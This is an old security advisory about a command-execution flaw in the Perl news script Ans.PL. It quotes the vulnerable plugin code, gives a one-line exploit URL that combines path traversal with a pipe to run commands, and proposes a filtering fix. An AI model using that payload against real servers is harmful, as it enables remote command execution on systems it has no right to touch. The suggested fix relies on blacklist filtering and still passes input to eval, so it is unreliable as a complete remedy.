#!/exploit/by/b0iler # script name: Ans.PL # Primary author of script: Avenger # script url: http://ans.gq.nu/ "Avenger's News System (ANS) is a PERL-based solution to creating an easy-to-update and easy-to-maintain web site. Instead of constantly uploading new news pages and wrestling with HTML, you can post stuff via a web-based form." The variable $QUERY is defined in the config file as: <define QUERY>"$ENV{'QUERY_STRING'}" When the script is ran it checks for a post, then it checks for a plugin. The problem is in the plugin subroutine: if (substr($QUERY, 0, 2) eq "p=") { $plugin = substr((split /&/, $QUERY)[0], 2); if (index("$QUERY", "&") < 0) { $QUERY = ""; } else { $QUERY = substr($QUERY, index("$QUERY", "&")+1); } open (PLUGIN, "$FILE_LOCATION/$plugin"); @plugin = <PLUGIN>; close (PLUGIN); eval("@plugin"); exit; } No input filtering is done on user input so command execution is possible. Exploit: ans.pl?p=../../../../bin/command argument|&blah Fix: Filter meta characters, .., and use < << > >> when calling open(). replace above code with this: if (substr($QUERY, 0, 2) eq "p="){ $QUERY =~ s/([\&;\`'\\\|"*?~<>^\(\)\[\]\{\}\$\n\r])/\\$1/g; #filter meta characters $QUERY =~ s/\.\.//g; #filter double dot (..) $plugin = substr((split /&/, $QUERY)[0], 2); if (index("$QUERY", "&") < 0) { $QUERY = ""; } else { $QUERY = substr($QUERY, index("$QUERY", "&")+1); } open (PLUGIN, "<$FILE_LOCATION/$plugin"); #added a < to the open() - readonly @plugin = <PLUGIN>; close (PLUGIN); eval("@plugin"); exit; } I attempted to contact the author on 2/1/02 but they haven't responded. _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp.